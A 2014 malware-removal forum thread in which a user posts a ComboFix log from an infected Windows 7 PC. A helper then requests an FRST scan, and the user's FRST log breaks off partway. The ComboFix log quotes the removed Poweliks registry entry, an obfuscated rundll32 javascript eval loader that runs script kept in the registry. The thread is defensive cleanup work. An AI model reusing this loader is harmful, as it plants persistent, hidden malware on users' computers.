Another dllhost.exe running amuck


  • This topic is locked
15 replies to this topic

#1 mpl006

Posted 14 September 2014 - 06:29 PM

My mom and step-dad's computer has been acting up recently and they wanted me to come take a look at it. They live about 2 hours away, so I went down Friday the 12th and worked on it for a total of about 18 hours. At first I was in safe mode and ran Spybot S&D, AVG Anti-Virus, and Malwarebytes to no avail. It didn't take long for me to figure out that if I disconnected from the router, the computer worked OK. I launched Task Manager and noticed all the instances of dllhost.exe when I plugged back in.

 

I found a few threads on here that kind of matched what was happening and ran ComboFix, and after that was done, I could plug in and it "worked." I say that because I could plug into the network and the computer wouldn't bog down. Before I left, I restarted to make sure it was really fixed, and the issue came back. I started ComboFix again so that I could get the computer connected to the internet and remote in to try and help long distance. I will post the log from ComboFix in a post below.

 

Thanks so much for your help!

 

Michael


ComboFix 14-09-12.01 - Dale 09/13/2014  18:39:24.2.2 - x86
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.1022.374 [GMT -5:00]
Running from: c:\users\Dale\Desktop\ComboFix.exe
AV: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Spybot - Search and Destroy *Disabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script data]
.
(((((((((((((((((((((((((   Files Created from 2014-08-13 to 2014-09-13  )))))))))))))))))))))))))))))))
.
.
2014-09-13 23:53 . 2014-09-13 23:53 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-13 06:38 . 2014-09-13 06:50 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-13 06:34 . 2014-05-12 12:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-13 06:34 . 2014-05-12 12:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-13 06:34 . 2014-09-13 06:34 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-12 23:59 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-12 23:14 . 2014-09-12 23:14 -------- d-----w- c:\users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 08:57 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-12 08:57 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-12 08:41 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-12 05:48 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-12 05:48 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-08-28 05:19 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-08-28 05:19 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-26 23:37 . 2014-08-26 23:37 -------- d-----w- c:\program files\AVG Security Toolbar
2014-08-26 23:37 . 2014-08-26 23:37 -------- d-----w- c:\programdata\Avg_Update_0814tb
2014-08-24 14:47 . 2014-08-24 14:47 -------- d-----w- c:\users\Dale\AppData\Roaming\AVG2014
2014-08-24 14:43 . 2014-08-24 14:43 -------- d-----w- c:\users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 14:39 . 2014-08-24 14:45 -------- d-----w- c:\programdata\AVG2014
2014-08-24 14:36 . 2014-08-25 05:06 -------- d-----w- c:\users\Dale\AppData\Local\Avg2014
2014-08-23 13:14 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-08-23 13:14 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-08-23 13:14 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-08-23 13:14 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-08-23 13:13 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-08-23 13:13 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-08-23 13:13 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-08-22 20:38 . 2013-09-20 15:49 18968 ----a-w- c:\windows\system32\sdnclean.exe
2014-08-22 20:38 . 2014-09-13 04:23 -------- d-----w- c:\program files\Spybot - Search & Destroy 2
2014-08-19 06:09 . 2014-05-14 14:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-08-19 06:09 . 2014-05-14 14:17 33792 ----a-w- c:\windows\system32\wuapp.exe
2014-08-16 23:18 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-08-16 23:18 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-08-16 23:18 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-08-16 23:18 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-08-16 02:38 . 2014-07-14 01:42 654336 ----a-w- c:\windows\system32\rpcrt4.dll
2014-08-16 02:38 . 2014-06-16 01:44 730048 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-16 02:38 . 2014-06-16 01:44 219072 ----a-w- c:\windows\system32\drivers\dxgmms1.sys
2014-08-16 02:38 . 2014-06-16 01:40 107520 ----a-w- c:\windows\system32\cdd.dll
2014-08-16 02:36 . 2014-07-16 02:46 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-16 02:36 . 2014-06-03 09:30 101824 ----a-w- c:\windows\system32\consent.exe
2014-08-16 02:36 . 2014-06-03 09:29 2363392 ----a-w- c:\windows\system32\msi.dll
2014-08-16 02:36 . 2014-06-03 09:29 1805824 ----a-w- c:\windows\system32\authui.dll
2014-08-16 02:36 . 2014-06-03 09:29 337408 ----a-w- c:\windows\system32\msihnd.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-08-12 08:03 . 2012-08-29 13:50 42784 ----a-w- c:\windows\system32\drivers\avgtpx86.sys
2014-08-06 15:49 . 2014-08-06 15:49 98584 ----a-w- c:\windows\system32\drivers\avgmfx86.sys
2014-07-25 07:35 . 2014-07-25 07:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-22 02:03 . 2014-07-22 02:03 200984 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-06-30 17:43 . 2014-06-30 17:43 121624 ----a-w- c:\windows\system32\drivers\avgdiskx.sys
2014-06-18 01:51 . 2014-07-09 04:34 646144 ----a-w- c:\windows\system32\osk.exe
2014-06-17 21:22 . 2014-06-17 21:22 188696 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2014-06-17 21:21 . 2014-06-17 21:21 197400 ----a-w- c:\windows\system32\drivers\avgtdix.sys
2014-06-17 21:18 . 2014-06-17 21:18 241944 ----a-w- c:\windows\system32\drivers\avglogx.sys
2014-06-17 21:17 . 2014-06-17 21:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-06-17 21:06 . 2014-06-17 21:06 27416 ----a-w- c:\windows\system32\drivers\avgrkx86.sys
2014-06-17 21:06 . 2014-06-17 21:06 21272 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}]
2014-08-25 22:35 3627032 ----a-w- c:\program files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{95B7759C-8C7F-4BF1-B163-73684A933233}"= "c:\program files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll" [2014-08-25 3627032]
.
[HKEY_CLASSES_ROOT\clsid\{95b7759c-8c7f-4bf1-b163-73684a933233}]
[HKEY_CLASSES_ROOT\AVG Secure Search.PugiObj.1]
[HKEY_CLASSES_ROOT\AVG Secure Search.PugiObj]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveBlacklistedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedViewOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncingOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AVG_UI"="c:\program files\AVG\AVG2014\avgui.exe" [2014-08-25 5188112]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^APC UPS Status.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
backup=c:\windows\pss\APC UPS Status.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk
backup=c:\windows\pss\Audible Download Manager.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
backup=c:\windows\pss\QuickBooks Update Agent.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^AOL Desktop.lnk]
path=c:\users\Dale\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AOL Desktop.lnk
backup=c:\windows\pss\AOL Desktop.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2012-07-27 20:51 919008 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2014-04-18 02:07 4672920 ----a-w- c:\users\Dale\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ApplePhotoStreams]
2013-09-15 19:34 59720 ----a-w- c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2013-04-22 02:43 59720 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AVG_UI]
2014-08-25 16:37 5188112 ----a-w- c:\program files\AVG\AVG2014\avgui.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CanonMyPrinter]
2011-03-15 02:09 2565520 ----a-w- c:\program files\Canon\MyPrinter\BJMYPRT.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CanonSolutionMenuEx]
2011-08-04 19:41 1637496 ----a-w- c:\program files\Canon\Solution Menu EX\CNSEMAIN.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Dell PanelMgr]
2008-06-17 04:04 541936 ----a-w- c:\windows\Dell\PanelMgr\SSMMgr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Display]
2012-01-24 21:09 284024 ----a-w- c:\program files\APC\PowerChute Personal Edition\DataCollectionLauncher.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GoogleDriveSync]
2014-08-08 15:34 22734160 ----a-w- c:\program files\Google\Drive\googledrivesync.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GrooveMonitor]
2009-02-26 23:36 30040 ----a-w- c:\program files\Microsoft Office\Office12\GrooveMonitor.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HostManager]
2008-06-24 18:34 41824 ----a-w- c:\program files\Common Files\AOL\1332695770\ee\aolsoftware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iCloudServices]
2013-09-14 08:38 59720 ----a-w- c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IndexSearch]
2008-06-13 17:38 46368 ----a-w- c:\program files\DELL\Dell 2335dn MFP\PaperPort\IndexSearch.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Intuit SyncManager]
2011-06-15 05:32 1532760 ----a-w- c:\program files\Common Files\Intuit\Sync\IntuitSyncManager.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2013-11-02 06:29 152392 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PaperPort PTD]
2008-06-13 17:40 29984 ----a-w- c:\program files\DELL\Dell 2335dn MFP\PaperPort\pptd40nt.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2013-05-01 08:59 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SDTray]
2014-06-24 15:42 4101576 ----a-w- c:\program files\Spybot - Search & Destroy 2\SDTray.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sidebar]
2010-11-20 12:17 1174016 ----a-w- c:\program files\Windows Sidebar\sidebar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SSBkgdUpdate]
2006-10-25 14:03 210472 ----a-w- c:\program files\Common Files\ScanSoft Shared\SSBkgdUpdate\SSBkgdUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2010-02-11 04:32 61440 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
2012-01-18 19:02 254696 ----a-w- c:\program files\Common Files\Java\Java Update\jusched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\T4S2PC]
2008-09-26 18:54 495616 ----a-r- c:\windows\twain_32\Dell\Dell2335\Scan2Pc.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\vProt]
2014-08-25 22:35 2640408 ----a-w- c:\program files\AVG Secure Search\vprot.exe
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\AVG\AVG2014\avgidsagent.exe [2014-08-25 3242000]
R2 SDScannerService;Spybot-S&D 2 Scanner Service;c:\program files\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-06-24 1738168]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;c:\program files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-06-27 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;c:\program files\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-04-25 171928]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-08-18 108032]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2010-11-20 15872]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2012-03-24 1343400]
S0 AVGIDSHX;AVGIDSHX;c:\windows\system32\DRIVERS\avgidshx.sys [2014-06-17 147736]
S0 Avglogx;AVG Logging Driver;c:\windows\system32\DRIVERS\avglogx.sys [2014-06-17 241944]
S0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx86.sys [2014-06-17 27416]
S1 Avgdiskx;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiskx.sys [2014-06-30 121624]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdriverx.sys [2014-07-22 200984]
S1 AVGIDSShim;AVGIDSShim;c:\windows\system32\DRIVERS\avgidsshimx.sys [2014-06-17 21272]
S1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx86.sys [2014-06-17 188696]
S1 Avgtdix;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdix.sys [2014-06-17 197400]
S1 avgtp;avgtp;c:\windows\system32\drivers\avgtpx86.sys [2014-08-12 42784]
S2 APC Data Service;APC Data Service;c:\program files\APC\PowerChute Personal Edition\dataserv.exe [2012-01-24 21880]
S2 avgwd;AVG WatchDog;c:\program files\AVG\AVG2014\avgwdsvc.exe [2014-08-25 289328]
S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys [2010-06-07 5120]
S2 vToolbarUpdater18.1.9;vToolbarUpdater18.1.9;c:\program files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [2014-08-12 1820184]
S3 VST_DPV;VST_DPV;c:\windows\system32\DRIVERS\VSTDPV3.SYS [2009-07-13 980992]
S3 VSTHWBS2;VSTHWBS2;c:\windows\system32\DRIVERS\VSTBS23.SYS [2009-07-13 266752]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-13 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-06-22 16:23]
.
2014-09-13 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-06-22 16:23]
.
.
------- Supplementary Scan -------
.
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 208.180.42.68 208.180.42.100
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - c:\program files\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll
FF - ProfilePath - c:\users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default\
FF - prefs.js: browser.search.selectedEngine - Conduit Search
FF - prefs.js: browser.startup.homepage - about:home
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{95B7759C-8C7F-4BF1-B163-73684A933233}"=hex:51,66,7a,6c,4c,1d,38,12,f2,76,a4,
   91,4d,c2,9f,0e,ce,75,30,28,4f,cd,76,27
"{D4027C7F-154A-4066-A1AD-4243D8127440}"=hex:51,66,7a,6c,4c,1d,38,12,11,7f,11,
   d0,78,5b,08,05,de,bb,01,03,dd,4c,30,54
"{18DF081C-E8AD-4283-A596-FA578C2EBDC3}"=hex:51,66,7a,6c,4c,1d,38,12,72,0b,cc,
   1c,9f,a6,ed,07,da,80,b9,17,89,70,f9,d7
"{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}"=hex:51,66,7a,6c,4c,1d,38,12,7c,f0,b1,
   38,5c,21,3d,0e,d9,78,0d,25,e1,c9,8c,d4
"{69D72956-317C-44BD-B369-8E44D4EF9801}"=hex:51,66,7a,6c,4c,1d,38,12,38,2a,c4,
   6d,4e,7f,d3,01,cc,7f,cd,04,d1,b1,dc,15
"{72853161-30C5-4D22-B7F9-0BBC1D38A37E}"=hex:51,66,7a,6c,4c,1d,38,12,0f,32,96,
   76,f7,7e,4c,08,c8,ef,48,fc,18,66,e7,6a
"{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}"=hex:51,66,7a,6c,4c,1d,38,12,d5,94,07,
   72,c2,98,42,03,c9,fd,97,9a,f4,87,69,57
"{DBC80044-A445-435B-BC74-9C25C1C588A9}"=hex:51,66,7a,6c,4c,1d,38,12,2a,03,db,
   df,77,ea,35,06,c3,62,df,65,c4,9b,cc,bd
"{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}"=hex:51,66,7a,6c,4c,1d,38,12,8f,19,47,
   2e,c4,15,0b,03,d7,b5,8c,e9,62,70,06,85
"{FF059E31-CC5A-4E2E-BF3B-96E929D65503}"=hex:51,66,7a,6c,4c,1d,38,12,5f,9d,16,
   fb,68,82,40,0b,c0,2d,d5,a9,2c,88,11,17
"{BDEADE7F-C265-11D0-BCED-00A0C90AB50F}"=hex:51,66,7a,6c,4c,1d,38,12,11,dd,f9,
   b9,57,8c,be,54,c3,fb,43,e0,cc,54,f1,1b
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:a0,4f,61,8e,21,26,cd,01
.
[HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-364017)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-09-13  18:58:03
ComboFix-quarantined-files.txt  2014-09-13 23:58
ComboFix2.txt  2014-09-13 16:41
.
Pre-Run: 396,488,941,568 bytes free
Post-Run: 396,215,791,616 bytes free
.
- - End Of File - - D18CCF68C35EBC8098C95FBCEF988CED
A36C5E4F47E84449FF07ED3517B43A31




#2 aharonov

  • Malware Response Team

Posted 14 September 2014 - 07:00 PM

Hi there,

it indeed looks like ComboFix wasn't able to remove the infection this time.
So let's get a FRST scan first:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 mpl006

  • Topic Starter

Posted 14 September 2014 - 07:55 PM

Thank you very much for the quick response.  I figured it would be a little while before I got one.  Here are the two logs:

 

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-09-2014
Ran by Dale (administrator) on DIMENSION-E510 on 14-09-2014 19:02:27
Running from C:\Users\Dale\Desktop
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
() C:\Program Files\Canon\IJPLM\ijplmsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
